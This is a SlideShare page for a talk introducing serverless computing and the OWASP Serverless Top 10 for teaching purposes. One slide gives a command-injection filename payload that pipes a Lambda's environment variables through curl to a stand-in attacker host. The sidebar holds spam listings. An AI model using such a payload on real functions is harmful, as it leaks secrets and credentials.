SlideShare une entreprise Scribd logo

OWASP Serverless Top 10

Télécharger en tant que PPTX, PDF
C
Chandrapal Badshah

Presentation that introduces Serverless technology and gives a glimpse of all the OWASP Serverless Top 10 vulnerabilities with code examples.

Logiciels
1  sur  55
Serverless Top 10 INTRODUCTION TO
About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
START WITH WHY - Simon Sinek
Once upon a time... Database Web Server CPU Memory Web Application Static Files
But ... Database Web Server CPU Memory Web Application Static Files
But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
CHANGED THE GAME
Introduction to Microservices
Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
Introduction to Serverless https://martinfowler.com/bliki/Serverless.html
Cloud Providers
Serverless Tools & Frameworks
Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
DEMO - Deploying Serverless App
So simple right ?
What if … ?
One question ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
Let’s jump into OWASP Serverless Top 10
A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
Can you see the bug ?
Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
A bug I recently found
A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
Vulnerable code …
Vulnerable code … Downloads the XML file from bucket and parses it.
The Payload ...
The result…
A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
Find the bug…
Find the bug… Gets the message content Sends the message content to dashboard
A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
Example Java payload
The payload in request…
And the result…
A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
Lambda code
Lambda logs
Lambda Logs (in case of huge payload)
Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
Stay tuned ! Damn Vulnerable Serverless App on its way
Any Questions ?

Recommandé

pwnd.sh
pwnd.shpwnd.sh
pwnd.sh
Chandrapal Badshah
 
mod_security introduction at study2study #3
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3
Naoya Nakazawa
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shell
Madhu Akula
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016
Rahul
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWS
Teri Radichel
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638
Riyaz Walikar
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
Madhu Akula
 
Mod security
Mod securityMod security
Mod security
Shruthi Kamath
 

Recommandé

pwnd.sh
pwnd.shpwnd.sh
pwnd.sh
Chandrapal Badshah
 
mod_security introduction at study2study #3
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3
Naoya Nakazawa
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shell
Madhu Akula
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016
Rahul
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWS
Teri Radichel
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638
Riyaz Walikar
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
Madhu Akula
 
Mod security
Mod securityMod security
Mod security
Shruthi Kamath
 
Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your Cloud
Teri Radichel
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
UTD Computer Security Group
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
OWASP
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs Security
Jason Ross
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
Romansh Yadav
 
Mod Security
Mod SecurityMod Security
Mod Security
Abhishek Singh
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
James Crowley
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containers
Aqua Security
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security Strategy
Teri Radichel
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure
Cheah Eng Soon
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
UTD Computer Security Group
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Paula Januszkiewicz
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
OWASP
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEM
Olesya Shelestova
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
OWASP
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
Michael Boelen
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...
webhostingguy
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackers
tomasperezv
 
demo1
demo1demo1
demo1
googli
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
googli
 

Contenu connexe

Tendances

[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
OWASP
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Paula Januszkiewicz
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
OWASP
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...
webhostingguy
 

Tendances (20)

Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your Cloud
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs Security
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
 
Mod Security
Mod SecurityMod Security
Mod Security
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containers
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security Strategy
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEM
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackers
 

Similaire à OWASP Serverless Top 10

Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
googli
 
Web Security Programming I I
Web Security Programming I IWeb Security Programming I I
Web Security Programming I I
Pavu Jas
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
googli
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
Avi Shulman
 
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Fwdays
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
Amazon Web Services
 

Similaire à OWASP Serverless Top 10 (20)

demo1
demo1demo1
demo1
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
 
Web Security Programming I I
Web Security Programming I IWeb Security Programming I I
Web Security Programming I I
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Docebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessDocebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverless
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best Pratices
 
Going Serverless on AWS
Going Serverless on AWSGoing Serverless on AWS
Going Serverless on AWS
 
Cloud Computing basic
Cloud Computing basicCloud Computing basic
Cloud Computing basic
 
Operations: Security
Operations: SecurityOperations: Security
Operations: Security
 
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
 
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
 
Serverless meetup Auckland #6
Serverless meetup Auckland #6Serverless meetup Auckland #6
Serverless meetup Auckland #6
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
 
Building Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudBuilding Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the Cloud
 

Plus de Chandrapal Badshah

Plus de Chandrapal Badshah (10)

Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
 
Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)
 
How to get started in InfoSec ?
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
 
OSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your Organization
 
Solving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using Frida
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
 
Web Application Firewall
Web Application FirewallWeb Application Firewall
Web Application Firewall
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
 

Dernier

Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Alberto González Trastoy
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
MyIntelliSource, Inc.
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Steffen Staab
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
mohitmore19
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
anilsa9823
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
harshavardhanraghave
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 

Dernier (20)

Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 

OWASP Serverless Top 10

  • 2. About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
  • 3. START WITH WHY - Simon Sinek
  • 4. Once upon a time... Database Web Server CPU Memory Web Application Static Files
  • 6. But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
  • 9. Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
  • 10. Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
  • 13. Serverless Tools & Frameworks
  • 14. Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
  • 15. Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
  • 16. DEMO - Deploying Serverless App
  • 19.
  • 21. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
  • 22. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
  • 23. Let’s jump into OWASP Serverless Top 10
  • 24. A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
  • 25. An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
  • 26. Can you see the bug ?
  • 27. Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
  • 28. Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
  • 29. A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
  • 30. A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
  • 31. A bug I recently found
  • 32. A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
  • 34. Vulnerable code … Downloads the XML file from bucket and parses it.
  • 37. A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
